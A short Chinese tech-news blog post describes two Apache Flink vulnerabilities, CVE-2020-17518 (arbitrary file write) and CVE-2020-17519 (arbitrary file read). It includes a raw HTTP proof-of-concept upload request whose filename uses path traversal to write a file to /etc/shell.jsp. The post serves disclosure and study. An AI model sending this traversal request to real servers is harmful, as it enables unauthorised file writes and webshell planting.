Apache Flink POC漏洞CVE-2020-17518/17519的示例分析

发布时间:2021-12-22 21:05:43 作者:柒染
来源:亿速云 阅读:292

今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

CVE-2020-17518: 文件写入

攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)

CVE-2020-17519: 文件读取

Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的)

POC:

POST /jars/upload HTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189
------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../etc/shell.jsp"
success------WebKitFormBoundaryoZ8meKnrrso89R6Y--

看完上述内容,你们对 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。

推荐阅读:
  1. apache flink指的是什么
  2. 如何进行Apache Flink CVE-2020-17518、17519的漏洞分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

apache flink poc

上一篇:Microsoft Exchange远程代码执行漏洞通告是怎么样的

下一篇:mysql中出现1053错误怎么办

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》